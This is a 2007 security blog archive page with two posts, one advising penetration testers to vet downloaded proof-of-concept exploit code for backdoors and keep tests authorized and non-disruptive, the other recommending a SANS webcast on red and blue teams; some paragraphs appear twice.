Archive for October 2007
When Penetration Tests Backfire
Posted by: agent0x0
Very good article over at Dark Reading today about testing PoC exploit code and security tools before you use them in a production environment.
"...how do you know if the PoC (proof of concept) exploit code you downloaded from Milw0rm or Packet Storm includes a backdoor?"
The author also mentions some very good things to consider when planning a pen test and I have added a few of my own:
- Do you need to run the pen test in a production environment? While I think that you should to simulate a real attack..some companies are not comfortable with that. Always be sure to find out and include this in your contract and/or authorization letter.
- Review your toolkit and make sure that you are not using tools and exploits that will cause a DoS or system to crash. Of course systems do crash sometimes which are out of your control (hence the reason you have a authorization to test letter), however, as a pen tester you should be doing everything you can to make sure you don't purposely crash or DoS systems. I suggest that at least 2-3 times a year your pen test team should meet for a few days and review your toolkit and perform detailed testing of these tools and code.
- Review and test PoC and exploit code before running it in a production environment. I don't think the client would be too happy if you inadvertently Trojan'd their systems!
- Try to supplement your team tool kit with a commercial tool like Core Impact or Immunity Canvas as these exploits are tested and have options to help ensure a targeted system does not crash.
"...how do you know if the PoC (proof of concept) exploit code you downloaded from Milw0rm or Packet Storm includes a backdoor?"
The author also mentions some very good things to consider when planning a pen test and I have added a few of my own:
- Do you need to run the pen test in a production environment? While I think that you should to simulate a real attack..some companies are not comfortable with that. Always be sure to find out and include this in your contract and/or authorization letter.
- Review your toolkit and make sure that you are not using tools and exploits that will cause a DoS or system to crash. Of course systems do crash sometimes which are out of your control (hence the reason you have a authorization to test letter), however, as a pen tester you should be doing everything you can to make sure you don't purposely crash or DoS systems. I suggest that at least 2-3 times a year your pen test team should meet for a few days and review your toolkit and perform detailed testing of these tools and code.
- Review and test PoC and exploit code before running it in a production environment. I don't think the client would be too happy if you inadvertently Trojan'd their systems!
- Try to supplement your team tool kit with a commercial tool like Core Impact or Immunity Canvas as these exploits are tested and have options to help ensure a targeted system does not crash.
SANS Institute - One Team, Two Team, Red Team, Blue Team
Posted by: agent0x0
I saw a good webcast and presentation on forming a red/blue team in your environment. What is a red/blue team? A red team is basically your attackers and your blue team is the defenders. This is a typical program used by the government and other large organizations to test the assessment process as well as incident response. Lots of good stuff for forming your own pen test team no matter what size organization you are.
You can view the entire archived webcast below (presentation by Dave Shackelford).
Note: you have to register for an account on the SANS portal to view the presentation but I highly recommend you do that anyway just to get the great SANS newsletters every week. :)
SANS Institute - Ask The Expert Webcast: One Team, Two Team, Red Team, Blue Team
You can view the entire archived webcast below (presentation by Dave Shackelford).
Note: you have to register for an account on the SANS portal to view the presentation but I highly recommend you do that anyway just to get the great SANS newsletters every week. :)
SANS Institute - Ask The Expert Webcast: One Team, Two Team, Red Team, Blue Team